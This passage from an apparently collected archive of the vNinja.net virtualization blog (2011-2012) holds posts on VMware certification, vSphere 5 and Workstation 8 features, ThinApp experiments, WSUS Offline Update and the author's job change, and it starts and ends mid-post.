Virtualization professionals that have their hands on the product everyday VCP 5 is much easier than VCP 4. In the end I only spent an hour and 10 minutes on the exam and passed with a score I was highly pleased with. My message to current VCP 4 holders is go ahead in and take a shot at the exam. You might be pleasantly surprised with how VMware has changed the structure of their exams. --- # Being Neil Armstrong URL: https://vNinja.net/rant/neil-armstrong/ Date: 2012-02-26 Author: christian Tags: Certification, Harakiri, Neil Armstrong, Nutjob, VCDX, VMware Now there is an ambitious post title if there ever was one, but it seems fitting as the next 12 months promises to be my most ambitious professional year to date. Like Neil, I´ve started a journey that could either crash and burn, or end up with my very own personal moon landing. Those of you that follow my antics on Twitter already know what I´m talking about, but I´ll spell it out once and for all: I´ve decided to go for the VCDX certification, and hopefully complete it within a timeframe of about 12 months. With my new role as a Senior Consultant for EVRY, certifications all of a sudden play a major role in my day to day work, so why not go all in and go for the top? I´ve been considering this for a while, but the last few months have solidified the idea that I should just go gung-ho and aim for the stars. So here I am, sticking my neck out and making this public knowledge. I´ll try my best to stick to the plan newly accredited VCDX Hugo Phan published after his defense. In much of society, research means to investigate something you do not know or understand. Neil Armstrong So there you have it, this norwegian has lost his mind and (for now) lives to tell about it. Wish me luck, I am certainly going to need it. --- # VMware Virtual Customer Labs URL: https://vNinja.net/news/vmware-virtual-customer-labs/ Date: 2012-02-04 Author: christian Tags: Hands-On, labs, VMware. vCL I´ve mentioned this earlier, VMware hands-in labs going public in 2012, but finally it seems like something is happening in that regard! Scott Sauer has announced the availability of “VMware Virtual Customer Labs” (vCL) where he walks us through the setup and delivery of the new vCL offering. At the moment it´s only available to “selected customers”, supported by a VMware pre-sales engineer, and the number of labs are limited. It´s still a work in progress, and I´m sure great things will come out of this! Now, how do I get access to it as a partner? Also, I wonder what possibilities that lies in this with regards to alternative VCP requirements? --- # VCP 5 Certification Requirements Clarification URL: https://vNinja.net/vmware-2/vcp-5-certification-requirement-clarification/ Date: 2012-02-03 Author: christian Tags: Certification, Rant, VCP, VMware In a recent article, VCP 5 certification course deadline looms over VMware pros both vNinja.net contributors (Christian and Ed) are quoted in relation to the VCP 5 certification upgrade deadline of February 29th 2012. While I can´t speak for Ed, I can clarify my own comments a bit. The following is a quote from VMware, taken from the article in question: “That requirement is in place to maintain the integrity of the certification. If people could pass the VCP 5 without exposure to and hands-on experience with vSphere 5, it would devalue the certification,” a VMware spokesperson wrote in an email. While I do see why VMware has that stance, and why they try to keep the exam “real”, my problem is that there is no way for anyone to do the VCP certification without classroom training. I don´t mind that VMware has a training requirement, and I don’t mind that you have to pay for it. What I do have a problem with is that I´m required to sit a 5 day training class. Why not offer an online VCP-prep course that you can complete in your own pace, complete with a pre-exam test that you can use to validate your skill set? That way VMware can still require a minimum of training pre-exam, get paid for it, and students can do their training in their own pace and when they have available time for it. Seems like a win-win (bingo!) situation to me? As far as I’ve heard the VCP5 exam focuses less on minimum and maximum configuration limits than the VCP4 which is a good thing, but at the same time I don´t think the Install, Configure and Manage course by itself is enough to pass the exam, so in essence VMware is already “devaluing” their own exam by requiring training that does not cover the entire curriculum. The hands-on requirement is a good one, and I applaud it, the best way to ensure that would be to turn the VCP exam into a hands-on-lab environment where you get tasks to complete, instead of multiple choice questions. Disclaimer: I have not yet tried to do the VCP 5 exam and I´m only commenting based on feedback provided by others who have. As far as the time available for existing VCPs to upgrade from VCP4 to VCP5, I also believe the timeframe is too short, and to be completely honest I don´t really see why there should be a time limit at all? After all, if you have the VCP4, you pretty much know what you´re in for with regards to the VCP5. Why rush it, and have people attempt to upgrade before they are ready? Let people do this on their own, in their own schedule, I don´t see how VMware benefits from enforcing a timeframe at all. Unless the motivation is selling more training, of course. --- # Vote for the Top VMware & Virtualization Blogs URL: https://vNinja.net/news/vote-top-vmware-virtualization-blogs/ Date: 2012-01-24 Author: christian Tags: fun, Virtualization, Vote Eric Siebert has opened up the voting for the top VMware & virtualization blogs. Head on over and cast your votes! Votes for vNinja.net and vSoup.net would be greatly appreciated, but since we’re not affiliated with the Dutch vMaffia we promise that you will not have to wear concrete boots or wake up to a horses head in your bed if you don´t vote for us. We think. --- # Iomega IX2 and Time Machine Support URL: https://vNinja.net/osx/iomega-ix2-time-machine-support/ Date: 2012-01-23 Author: christian Tags: Firmware, Hack, Iomega, IX2, Mac, OS X As Mr. Simon Seagrave has pointed out, there is a fix available to enable OSX Lion Time Machine support for Iomega IX2 and IX4 NAS storage devices. I decided to take this a little step further, and try to upgrade my old (and discontinued) Iomega IX2-200 to the new IX2-200 Cloud Edition firmware. Initially this was a big failure, as I seemingly managed to brick my device. It was only responding to pings (so the TCP/IP stack was loaded and working), but I could not bring up the web based management tool nor connect via telnet or SSH. Thankfully Will van Antwerpen had investigated the firmware upgrade to cloud edition a bit more than I had, and pointed me to the General NAS-Central Forums where I found a link to a great HowTo explaining the entire process: Upgrading Iomega ix2-200 to Cloud Edition. As that article also mentions, I had to do the process twice to get it to kick in and un-brick my IX2-200 and get it running with the new Cloud Edition firmware. After configuring the IX2 with security and setting up Time Machine on the Macbook Air, Time Machine seems to be running without problems. Excellent --- # Creating and Using a Virtual Floppy in vSphere URL: https://vNinja.net/virtualization/creating-virtual-floppy-vsphere/ Date: 2012-01-07 Author: christian Tags: Bitlocker, Encryption, ESXi, Floppy, TPM, vSphere My new colleague Olav Tvedt asked me if I could test his method of enabling Bitlocker in a VM, on VMware vSphere. Of course, I was happy to oblige. I followed the same steps as he did in his Running Bitlocker on a Virtual computer post, and it worked perfectly. The only real difference between doing this in Hyper-V and on ESXi, is that the virtual floppy drive on ESXi by default doesn’t emulate an empty floppy. So, in order to mount a virtual floppy you need to create a new floppy image. Thankfully the vSphere Client can do this for you! To use the vSphere Client to create a floppy image you can later mount in a VM, you need to edit a VM’s settings. Find the floppy drive, if the VM doesn’t have one add one, close the window and return to the VM settings once the floppy drive has been added, and select “Create new floppy image in datastore: “. Click on the Browse button and browse to your preferred location for the floppy image. Name it, and click on Ok. Click on Ok again to close the VM settings window and return to the vSphere Client. There you go, an empty virtual floppy image that you can mount in a VM is now created. To mount the image, find the floppy drive icon in the vSphere client and select the Connect to floppy image on a datastore option. Browse to the location where you created the floppy image, and select it. Now, the VM has an empty floppy that you’ll need to format before you can use it. Follow Olav’s guide to encrypt the boot drive with Bitlocker, without the need for a TPM chip or USB device connected to the VM! And yes, it works as you can see here: So much for never needing a floppy disk again. Oh, and by the way, you can of course do this is VMware Workstation 8 as well. --- # Building The Ultimate vSphere Lab Series URL: https://vNinja.net/news/building-ultimate-vsphere-lab-series/ Date: 2012-01-03 Author: christian Tags: Lab, Sammy Bogaert, VMware, vSphere, Workstation Sammy Bogaert has posted a 12 part series called “Building The Ultimate vSphere Lab”, which knocks the socks of my previous vSphere 4.x series. In reality this means that my planned series for vSphere 5.x is now cancelled, as there is no need to duplicate Sammy’s efforts. Be sure to check the series out! --- # Goodbye 2011, you were great URL: https://vNinja.net/news/goodbye-2011-you-were-great/ Date: 2011-12-30 Author: christian Tags: 2011, Christian Mohn, fun, Statistics, vNinja Yes, this is YAEotYP, so if you’ve already read tons of them I apologize. 2011 - My personal view # 2011 has been a steamroller of a year.The vSoup Virtualization Podcast got aired the first time, and we’ve recorded and published 19 full episodes in the inaugural year. I was awarded the vExpert title for the first time, and even got invited to Tech Field Day #6 in Boston. In addition to this, I wrote a white paper for Veeam, was included in the Server Virtualization Advisory Board, joined Rick Vanover for a Veeam Community Podcast, and appeared in two video interviews. One with Mike Laverick about the #VMTNSubscriptionMovement and one where Eric Sloof ambushed me with a camera while visiting Bergen. Lots of exiting projects were started in 2011, including my PowerCLI based automation project for vessel installations, migrating from standalone ESX hosts to blade servers (HP c7000 + Virtual Connect/Flex10) in addition to the normal day to day operations and after 8 years at Seatrans AS, I handed in my papers, moving on to a new role for EDB ErgoGroup. 2011 vNinja.net Statistics # 2011 was the first year this site existed, so I can’t really compare the traffic it has received with 2010, but based on the few months it existed in 2010 the traffic increase has been enormous. 2011 Facts # Busiest Day: September 15th Busiest Month: September Top 5 articles: Installing Windows 8 Developer Preview in VMware Workstation 8 VMware Workstation 8 — What’s new? Using USB Pass-through in vSphere 4.1 VMware vSphere Lab: Virtual Edition — Part 1 Installing and configuring VMware vCenter Operations Top Referrers: (not counting Search Engines/Twitter) Planet v12n VMware Communities ESX Virtualization About.me vm4.ru And that’s it for 2011. Personally 2012 looks even more promising, and hopefully my exposure to more diverse environments should be reflected back on the site as I’m certain it will spur more posts and more interesting discussions. See you in 2012, I think we’re in for a cracker. --- # Auto Installation and Configuring of vSphere ESXi 5 URL: https://vNinja.net/virtualization/auto-installation-and-configuring-of-vsphere-esxi-5/ Date: 2011-12-21 Author: christian Tags: automation, ESXi, fun, Ops, PowerCLI, Powershell, realworld, Virtualization, VMware One of the last projects I’ve been involved with at Seatrans, is to automate the installation and configuration of vSphere ESXi 5 hosts for deployment on vessels. I’ve talked a bit about this before, both on vSoup and in Setting Up Automated ESXi Deployments where I outlined my PXE and PowerCLI based installation and configuration scheme. Not much has changed since then, except updating the PXE server to offer ESXi 5, instead of ESXi 4 and a lot of work has been put into the scripting, including a front-end GUI for the PowerCLI script itself. The end “product” is now in place for mass deployments for internal use. The following video shows how the PXE based installation works, as well as a run through the now GUI based configuration tool aptly called Seatrans Hypervisor Installation Tool. The video jumps a bit between two VMs, one running Windows Server 2008 R2, that runs the DHCP/PXE services and the PowerCLI script, and one that gets ESXi installed and configured: This goes to show that you can create your own, specialized and portable deployment solution without requiring elaborate network configurations or reconfiguring of existing infrastructure. Note: I will not be providing downloadable versions of the final script at this time. The reason for this is quite simple, it’s very specific and tailored for a non-generic environment. If I can manage to find the time, I’ll post a generic version later but in order for anyone else to utilize the PowerCLI scripts I’ve created, a lot of work is required. --- # DaaS or Having Fun with ThinApp URL: https://vNinja.net/virtualization/daas-or-having-fun-with-thinapp/ Date: 2011-12-09 Author: christian Tags: DaaS, Doom, fun, ThinApp While using ThinApp to create a standalone version of TweetDeck 0.38.2, since the newly announced 1.0 version looks, acts and feels like a 0.1 version, I posed the following question on Twitter: ["Hrm, what other apps should i #ThinApp while I'm at it?"](https://twitter.com/#!/h0bbel/status/145249562490179585). Kevin Kelling immediately responded with “Doom”. Naturally, I decided to give it a go. A quick download of ZDoom later, and a quick run through the ThinApp Setup Capture later, the following was born (view in full screen for better viewing): Thus, DaaS (Doom as a Service) is born as a concept. --- # Blatant Self Promotion URL: https://vNinja.net/virtualization/blatant-self-promotion/ Date: 2011-11-28 Author: christian Tags: Podcast, Quotes, Veeam, Virtualization, VMTN As the title says, it’s been one of my more “public” weeks ever. Besides my “normal” vSoup engagement, this week I’ve also been involved with Mike Laverick’s VMTN Subscription Movement Miniwags to voice some of my views about the #VMTNSubscriptionMovement. Fair warning: This is video, and please to remember that during recording Movember was nearing its final phase. VMTN Subscription Movement Miniwags – Christian Mohn Secondly, I was a guest on the Veeam Community Podcast Episode 45 – vSphere 5 Storage Potpourri. Third, and last, SearchServerVirtualization posted VMware vSphere Storage Appliance: Devil’s in the details which also includes some commentary from yours truly regarding the VSA. --- # Testing VMware vSphere 5 Swap to Host Cache URL: https://vNinja.net/vmware-2/testing-vmware-vsphere-5-swap-to-host-cache/ Date: 2011-11-22 Author: christian Tags: Experiment, Host Cache, SSD, VMware, vSphere 5 A little while ago I fitted a small 64GB SSD disk to my HP MicroServer just to have a quick look at the new vSphere 5 feature Swap to Host Cache, where vSphere 5 reclaims memory by storing the swapped out pages in the host cache on a solid-state drive. Naturally, this is a lot faster than swapping to non-SSD storage, but you will still see a performance hit when this happens. For more details on Swap to Host Cache, have a look at Swap to host cache aka swap to SSD? by Duncan Epping. Now, in my miniscule home lab setting it’s somewhat hard to get some real tangible performance metrics, so my little experiment is non-scientific and only meant to illustrate how swap to host cache gone wild would look in a real world environment. After installing the SSD drive, and configuring Swap to Host Cache, I created two VMs ingeniously called hostcacheA and hostcacheB. Both were configured with 14GB of memory, which should nicely overload my host that has a whopping 8GB of memory in total. Now, with memory features like ballooning, transparent page sharing, and memory compression I needed to make sure that the actual memory was used, and in addition it had to contain different datasets to make sure that the host cache actually kicked in. To make sure of this, I downloaded the latest ISO version of Memtest86+ and connected it to the empty VMs. When starting the VMs, they immediately started testing their available memory and sure enough, they started eating into the host cache. As you can see from the screenshot below, the longer the memtest ran the more host cache was utilized. Bonus points for figuring out when the test VMs were shut down… So there it is, performance graphs showing that the host cache is indeed kicking in and getting a run for it’s money. Since this was a non-scientific experiment, I don’t have any real performance counters or metrics to base any sort of conclusion on. All I was after was to see if it came alive, and clearly it did. --- # VMware Horizon Application Manager Now and Beyond URL: https://vNinja.net/virtualization/vmware-horizon-application-manager-now-and-beyond/ Date: 2011-11-16 Author: christian Tags: App delivery, Horizon, Horizon Application Manager, SaaS, ThinApp, Virtual Application, VMware VMware has announced Horizon Application Manager 1.2, and together with the new ThinApp 4.7 release it promises “end users access to Windows, SaaS and enterprise web applications across different devices while retaining control and visibility via policy-driven management”. VMware Horizon Application Manager now manages your ThinApp applications making it easier and faster to provide virtualized Windows applications to end users. From Horizon Administration, you can deploy ThinApp packages, entitle users and groups, track user licenses, and manage application updates. The coupling of the Horizon Application Manager with ThinApp is a great idea, and when I saw today’s announcement I got pretty excited. The possibility to have your own internal application portal providing your end users with self-service installs of virtualized applications is great news and could potentially be really useful in a great number of organizations. Sadly my initial excitement quickly faded when I realized that for now Horizon Application Manager is a hosted service, that requires an on premise connector in your infrastructure that sends over a limited set of Active Directory data to enable it to check user account or group access to the applications it offers. The connector provides single sign-on (Kerberos) functionality for users already authenticated in your Active Directory and authenticates the user to the Horizon service using SAML, so the hosted service never has the AD password. The hosted service does still needs some information like samaccountname, first name, last name, email and a GlobalUID. For more details, have a look at Understanding VMware Horizon Application Manager by Eric Sloof. This also means that users who run a virtualized application provisioned by Horizon Application Manager an active internet connection is required, even if the virtualized application packages are stored on a local (to the user) file share. Subsequent application launches does not require an active connection, as the applications are copied to the local system on the initial run. The Horizon agents retrieves a lease for the application, from the Horizon service, for an administrator configurable number of days (30 days default) and the end-user can run the application, without connecting to the Horizon service, until the lease expires or is renewed. For many organizations, including mine, this poses a real problem. “Handing over” Active Directory data to a hosted service is not something I would want in my environment, especially when our use case would be to provide end users with a self-service application portal for local applications. Other organizations might look at that differently though, and this might not be a concern for all customers. I understand that Horizon Application Manager was initially created for SaaS scenarios where a hosted authentication portal makes sense. I also understand that this is the first version that provides integration with ThinApp, and this is very much a product still in development and refinement. For now, Horizon Application Manager does not provide the use case that I was looking for but thankfully Ben Goodman, Lead Evangelist for VMware Horizon, has taken the time to address my call for an on-premise version of Horizon Application Manager: I understand your apprehension. Horizon was built on top of technology originally designed exclusively to be a Single-Sign on service to SaaS applications. We are in the process of expanding that technology to become a true enterprise service. This is happening in two ways, the first is by adding application support beyond SaaS. The first step was Windows support via ThinApp and we are looking at other application platforms to follow. The second is evaluating options for moving some or all of product on-prem. Both of these steps are the primary focus of the development team over the next 12-18 months and we are really excited about where we are taking Horizon. This is great news, an on-premise version that provides exactly what I’m looking for seems to be in the pipeline and on VMware’s roadmap for Horizon Application Manager. I just wish I had it now, it would have been perfect for a project I’m working on at the moment that I hope to wrap up by the end of the year. Oh well, there is always next year and the next project! --- # VMTN Subscription URL: https://vNinja.net/virtualization/vmtn-subscription/ Date: 2011-11-05 Author: christian Tags: Home Lab, Licenses, Trial, VMTN Subscription Mike Laverick has started something of a petition to bring back the VMTN Subscription option, and I could not agree more! The VMTN Subscription was a way for interested parties to pay for a years subscription to VMware products, akin to the Microsoft Technet subscription program. It’s not intended for production use, but as a means to get hold of products for lab work, testing and development. I don’t understand why VMware pulled the plug on that option back in 2007, but I do understand why it’s time to bring it back to life. As is the case with Mike, as a vExpert I can probably get hold of all the bits and pieces on my own, but not everyone has the same opportunities and I’m sure that’s actually stifling community knowledge. The VMware community is filled with great resources, available and shared between it’s members, all we want is for VMware to enable the community to grow even more by facilitating home labs, test environments and exploration of their products. That has to be in VMware’s own interest too. It’s not like we’re looking for a free lunch here, but what we’re looking for is something between the 60 days trial versions and the full production licensed products. After all, we don’t like rebuilding our labs every 60 days do we?** The announcement of the VMware Labs going public in 2012 is a step in the right direction, a reinstatement of the VMTN Subscription would be another big step. Come on VMware, I know you have it in you! If you want to add your own voice to the discussion, have a look at this VMware Communities discussion thread, it’s already got some traction and the more attention it gets the better. --- # Why Can't I Syslog my VMware ESXi Installation? URL: https://vNinja.net/virtualization/why-cant-i-syslog-my-vmware-esxi-installation/ Date: 2011-11-04 Author: christian Tags: ESXi, ESXi 5, Feature Request, Installation, Syslog Juan Manuel Rey’s post Monitor ESX 4.x to ESXi 5.0 migration process show how you can watch the progress of an ESX 4 to ESXi 5 upgrade procedure, by looking at the live logs. While this is very useful, and in many cases a real learning experience, it got me thinking that these logs should be available remotely as well. Since ESXi supports, and actively encourages, the use of an external Syslog service for log file safekeeping and monitoring, shouldn’t the installation logs for ESXi also be logged externally if configured? Thinking that I couldn’t be the first person that thought of this, I looked through the scripting section of vSphere Installation and Setup - vSphere 5.0 guide I was very surprised to see that there is no option to configure syslogging until after the installation is finished and the host configuration script(s) runs (ks.cfg). By using a ks.cfg script you can automatically configure syslog settings, but since that happens after the installation is done, and the host is potentially rebooted, the installation logs are lost (ESXi logs are not persistent by default) unless you run something that copies them over to another location before the reboot happens. Of course, when I asked on Twitter the Godfather of Ghetto, William Lam responded that you could always create a python script that runs after the install, before a reboot, that uploads the logs to a syslog server. While this is all fine and dandy, I would still like to have the possibility to configure a syslog server during the installation, and have the installation procedure fling all it’s log goodness at the syslog server while the installation runs. With new features like Autodeploy being utilized, having these logs automatically gathered (without ghetto hacking the installation) in a central location sounds like a really good idea to me? Surely, I’m not the only one? Is this something that has enough brains behind it to actually warrant a proper feature request being filed with VMware? --- # My Personal vMotion URL: https://vNinja.net/news/my-personal-vmotion/ Date: 2011-11-04 Author: christian Tags: Change, EDB ErgoGroup, Personal, Seatrans, Work Every once in a while an opportunity presents itself that is just too good to pass up and after 8 years at Seatrans AS I’ve decided to move on and and accept a position as a Senior Consultant in the Infrastructure Consulting division of EDB ErgoGroup. Seatrans has been a fantastic employer, and without the backing and support I’ve had over the years I would not be in a position where this change would be possible. It was with mixed emotions I handed in my notice, but I’m 100% certain that this is the right move, at the right time, for me personally. As a consultant my main focus will still be virtualization in general, and VMware solutions in particular. The upside to this is that I will definitely be able to work even more with the technology closest to my heart, and with a larger team that has a similar passion for technology. Moving back to the consultant side of the table should be an interesting challenge, and one that I’m really looking forward to. The blog will stay the same, perhaps this change might even bring more content in as I’m going to be exposed to a lot of different infrastructures and challenges. I’ve also set a couple of pretty hefty personal goals for 2012, but I’ll keep those to myself until I see how everything pans out. 2012? Bring your A game, because I’m awake, strong and ready! --- # Moving On URL: https://vNinja.net/news/moving-on/ Date: 2011-09-23 Author: christian Tags: if ((Get-date) -gt (Get-date 2012-01-01)) {Get-VM h0bbel | Move-VM -Datastore newEmployer -RunAsync } More details later. --- # Network Simulation in VMware Workstation 8 URL: https://vNinja.net/virtualization/network-simulation-in-vmware-workstation-8/ Date: 2011-09-15 Author: christian Tags: Networking, Ops, VMware, Workstation 8 In the new VMware Workstation 8 release, VMware has added a rudimentary network simulation setting where you can tweak bandwidth and packet loss for a given network card. Very useful when testing applications and servers and want to know how they react to network issues, or if you want to simulate a WAN link. I know this was available in Workstation 7 as well, but it used to be a team feature. Now it’s per vNIC feature, which makes it much more useable. Configuring it is very easy, but you need to know where to look to be able to find the feature. Configuring Network Adapter Advanced Settings in VMware Workstation 8 # Find your VM, right click it and select settings Select the Network Adapter and click on the “Advanced…” button This brings up the Network Adapter Advanced Settings window, where you can tweak the network settings including inbound/outbound bandwidth and packet loss percentage There are a number of predefined settings for bandwidth, making it easy to simulate various scenarios like ISDN, cable, leased T3 and so on. You can even modify the virtual network card MAC address in the same window, if you need to do that. Tweak the settings, and the new bandwidth and packet loss settings will immediately be applied to the VM Configuring Network Adapter Advanced Settings in VMware Workstation 8: Video Demo # Conclusion # I love this. In my day job I’m often faced with simulating how different applications work over some rather wonky WAN lines, and building this kind of feature set into VMware Workstation 8 makes a lot of sense. I do hope they improve it in the future though, as I really would like to see it add tweakable settings for latency as well, which often is the main killer in WAN environments. For now, I’ll have to stick to WANem for the latency simulation, at least until VMware adds latency tweaking to VMware Workstation. --- # Installing Windows 8 Developer Preview in VMware Workstation 8 URL: https://vNinja.net/virtualization/installing-windows-8-developer-preview-in-vmware-workstation-8/ Date: 2011-09-14 Author: christian Tags: fun, Microsoft, video, Virtualization, VMware, Windows 8, Workstation 8 Installing Microsoft Windows 8 in a VMware Workstation 8 VM turned out to be a real piece of cake. Follow the screenshots for the procedure I used, but basically all I did was to create a new VM with the pre-configured “Windows 8 Server” preset and inserted the downloaded ISO file. Note: Windows 8 Server has been removed as a preset option in the final release of VMware Workstation 8, my screenshots are from the beta version. If you want to install Windows 8 in the GA version of VMware Workstation 8, you’ll need to do a manual install (as opposed to Easy Install). Use the Windows 7 option as a baseline. Windows 8 VM Configuration Screenshots # [gallery link=“file”] Networking, sound and other virtual hardware issues were non-existing, everything just works right out of the box (or .iso as the case is). Adding more than 1GB memory to the VM also helps a lot when it comes to it’s responsiveness. Windows 8 in VMware Workstation 8 Installation Video # Various Windows 8 Screenshots # [gallery link=“file” id=“1517”] --- # Backup Academy - Do You Know Your VM backups? URL: https://vNinja.net/virtualization/backup-academy-do-you-know-your-vm-backups/ Date: 2011-09-13 Author: christian Tags: Backup, Backup Academy, Certification, Hyper-V, Veeam, Virtualization, VMware The newly opened Backup Academy, by Veeam, aims to educate administrators, and others interested in virtual machine backup, in the required skills to maintain a proper backup strategy for your virtual infrastructure. Currently the site has 8 videos available, covering content from disaster recovery to backup integrity tools. Even if it is run by Veeam, it does not focus on Veeam specific products or services, but rather on the general ideas behind a successful backup and disaster recovery of both VMware and Hyper-V based environments. Complete with training videos and even a free certification exam you can take when finishing the very nice videos provided by the academy professors. Head over to the Backup Academy today, even if you are a seasoned virtual administrator. Who knows, you might even learn something! --- # VMware Workstation 8 - What's new? URL: https://vNinja.net/virtualization/vmware-workstation-8-whats-new/ Date: 2011-09-07 Author: christian Tags: Beta, Software, VMware, Workstation, Workstation 8 VMware is close (still in beta) to releasing the new major release of VMware Workstation. Update 14. September 2011: VMware Workstation 8 has now officially been released. VMware Workstation 8 brings a lot of new features and enhancements to the table, and I’ve been lucky enough to play around with it in the beta program. VMware Workstation 8 System Requirements # To be able to install VMware Workstation, the host system processor needs to meet the following requirements: 64-bit x86 CPU LAHF/SAHF support in long mode To determine if your host system is 64-bit capable, download CPU-Z to determine the capabilities of your processor. To be able to run nested 64bit guests, like VMware vSphere 5 hosts, the system needs additional CPU features: AMD CPU that has segment-limit support in long mode. Intel CPU that has VT-x support. VT-x support must be enabled in the host system BIOS. For a list of Intel processors that support VT-x check Intel® Virtualization Technology List, or use CPU-Z to identify that as well. VMware Workstation 8 - New features # New User Interface The user interface has been updated with new menus, toolbars, and an improved preferences screen. Remote Connections Connect to Server feature allows remote connections to hosts running Workstation, ESX 4.x and Virtual Center. You can now use Workstation as a single interface to access all of the VMs you need regardless of where they reside. Upload to vSphere Integrated vSphere drag and drop integration. Automatic usage of OVFTool enables easy uploading of VMs from VMware Workstation to ESX hosts or vCenter. Move workloads from local test environment into production environment with a few mouse clicks. Share your VMs This new features allows you to control who access them from other instances of Workstation, great feature for teams working together or single administrators that access the same VMs from multiple computers. Also, a VM that is shared is started with the host OS without starting the VMware Workstation GUI, similar to how VMware Server worked before it was discontinued. New default keyboard driver To limit the number of reboots required during installation/upgrade of VMware Workstation, the Enhanced Keyboard functionality is no longer installed by default. Note: Upgrading from VMware Workstation 7 to 8 keeps and upgrades the existing driver unless VMware Workstation 7 is uninstalled before installing version 8. Virtual VT-x/EPT or AMD-V/RVI This is a good one, at least for all of us that run lab environments on our desktops or laptops. This setting enables you to run 64bit guests inside nested hypervisors like VMware vSphere 5. To enable it, edit the vCPU settings for the particular VM. Better Teams Add team attributes to any VM without any of the drawbacks. No longer forced to make a Team in order to manage multiple VMs together. Improved graphics performance in guests Improved vSMP Other Virtual Hardware Improvements Memory support is now 64GB per VM HD Audio is available for Windows Vista, Windows 7, Windows 2008, and Windows 2008 R2 guests (RealTek ALC888 7.1 Channel High Definition Audio Codec) USB 3.0 support for Linux guests. (Not available for Windows guests) Bluetooth devices can be shared with Windows guests --- # VMworld Hands-on Labs going public in 2012 URL: https://vNinja.net/virtualization/vmworld-hands-on-labs-going-public-in-2012/ Date: 2011-08-30 Author: christian Tags: labs, VMware, vmworld VMware Labs now has fixed data centers which means that the VMworld Hands-On labs are going to be publicly available in early 20112! Hear Mornay Van Der Walt, Senior Director R&D at VMware, explain the details in this video from VMworld TV: This is great news, and I’m sure I’m not the only one who thinks this is a really good idea. --- # SCCM 2007 Not a Virtualization Candidate? URL: https://vNinja.net/microsoft-2/sccm-2007-not-a-virtualization-candidate/ Date: 2011-08-26 Author: christian Tags: Microsoft, Ops, realworld, SCCM, Windows The last couple of days I’ve been in training class, taking the 6451B Planning, Deploying and Managing Microsoft System Center Configuration Manager 2007 course. One of the first things that got mentioned, was that for larger deployments you should not run System Center Configuration Manager virtually. Of course, this caught my eye as I’m a proponent for the virtualize first “movement”. It runs out that the reason for this is that Configuration Manager is somewhat poorly designed, as just about everything it receives from the clients in the network is placed in text based log files (inbox folder) before being processed and pumped into the back-end SQL DB. SCCM lives for and eats log files for a living. I’m sure there are good reasons for this, especially back in the day when SCCM 2007 was developed, but in retrospect this seems to be a poor design choice. Especially since the IO intensity of writing text-based log files is high, and doesn’t scale well when you have loads of clients which SCCM 2007 supposedly is designed for in the first place. There are ways of alleviating the strain on the machine running SCCM, like running the SQL server on a different server and running the management console on your local computer (remember a Windows server is tuned, by default, to prioritize background tasks), but the fact remains that sum of all the small write operations SCCM constantly does to your storage puts a heavy strain on it. So, if you want to run SCCM 2007 virtualized in your environment, make sure your storage is up to the task and that you don’t saturate it by deploying what is in essence management software. Perhaps it is better to run it on a physical server with adequate local storage, but don’t blame it on virtualization, blame it on poor design in SCCM 2007. Hopefully Configuration Manager 2012, which is currently in beta 2, behaves better when it’s released. If not, how will Microsoft defend not getting real performance when running it in Hyper-V (or any other Hypervisor). --- # Poor Man's WSUS URL: https://vNinja.net/microsoft-2/poor-mans-wsus/ Date: 2011-08-25 Author: christian Tags: Microsoft, Ops, Patching, Tool, WSUS Not that WSUS is expensive, after all it’s a “free” addon to the server you’re already running if you need it. Of course, running your own Windows Server Update Services (WSUS) infrastructure is preferable in just about every scenario except for some edge cases where bandwidth or latency issues might prevent you from syncing the updates from a central repository. Sadly, these edge cases enter the fray from time to time and I recently found myself in the middle of such a scenario. Without a WSUS infrastructure to sync from, and with very poor network connectivity how would you go about getting hold of all the Microsoft patches for a given OS and Office suite? Manually download all the patches, and then manually (or scripted) apply them to the clients? Thankfully his is where WSUS Offline Update comes to the rescue! This clever little application, that requires no installation what so ever, helps you patch Microsoft Windows and Microsoft Office without having an active network connection. In essence WSUS Offline Update lets you specify which operating systems and what versions of Office (and languages) you want to have patches available for in it’s repository. Run ..\wsusoffline\UpdateGenerator.exe to select versions and download them. It then proceeds to connect to Microsoft and download all applicable patches, and service packs if you want it to, figuring out the dependencies and supersedes along the way. Of course, this takes a while, but once it’s done you have a lovely little local repository of all the current Microsoft patches. Since WSUS Offline Update doesn’t require an installation, just unzip and run, it’s also very easy to move the repository to an external drive, USB stick or even transport it via the network. In addition it also provides built in methods for creating ISO files or place the files directly on a USB media. When the patches have been downloaded, all you have to do is get the files transferred to the target client and run the ..\wsusoffline\client\UpdateInstaller.exe file and the patches will be applied to the system you ran it on. It also keeps track of it’s local repository, to make sure that the next time it’s run it only downloads patches that has been released by Microsoft since the last run. All in all, this a great tool to keep in your tool belt, it sure helped me this time! --- # vSphere 5: ESXi Installation Video URL: https://vNinja.net/virtualization/vsphere-5-esxi-installation-video/ Date: 2011-08-25 Author: christian Tags: ESXi, fun, video, Virtualization, VMware, vSphere, vSphere 5 To celebrate vSphere 5 GA release today, I’ve recorded a quick video of the old school CD/ISO based installation: vSphere 5 ESXi Install Video from Christian Mohn on Vimeo. Seems strangely familiar, right? Enjoy! --- # VMFS-5: Block Size Me URL: https://vNinja.net/virtualization/vmfs-5-block-size-me/ Date: 2011-08-05 Author: christian Tags: Block Size, Datastore, storage, VMFS, VMware, vSphere 5 The up and coming release of VMware vSphere 5 comes with an upgraded versjon of the VMware vStorage VMFS volume file system. One of the problems with VMFS-3 an earlier is that the block size you define when you format the datastore, determines the maximum size of the VMDK files stored on it. This means that when planning your datastore infrastructure you must have an idea on how large your VMDK files will potentially be during the lifecycle of the datastore. For VMFS-2 and VMFS-3 the block sizes and their impact on VMDK files looks as follows: [table id=2 /] In other words, if you format your datastore with a 1MB block size, with VMFS-3, you are limited to a maximum VMDK file size of 256GB. Of course, you can work around this by adding more VMDK files to your VM, and then extending the disks inside the installed OS in the VM, but over time that might get a bit messy. The only way to change the block size, is to migrate all the VMs stored on that particular datastore to a different one, and reformat your original datastore with a new block size. For environments with limited storage space, this can be a real headache. Thankfully VMware has made this a thing of the past in VMware vSphere 5, and VMFS-5. VMFS-5 has a new unified block size of 1MB, and which no longer limits you to 256GB VMDK files. In fact, the block size no longer really matters, as the limits are removed completely. The table for vSphere 5 and VMFS-5 looks a bit simpler: [table id=3 /] Upgrading from VMFS-3 to VMFS-5 is an online & non-disruptive upgrade operation, meaning your can do it while your VMs are running on the datastore. Thankfully you can also extend VMDK files, to the new limits, on an upgraded VMFS-3 datastore, given that it has been upgraded to VMFS-5. Note: Remember to update all your hosts to vSphere 5 before upgrading your datastores, since vSphere 4 (and earlier) can’t read the new VMFS-5 filesystem. This is great news for vAdmins, since we no longer have to worry about the block size as a limiting factor for our 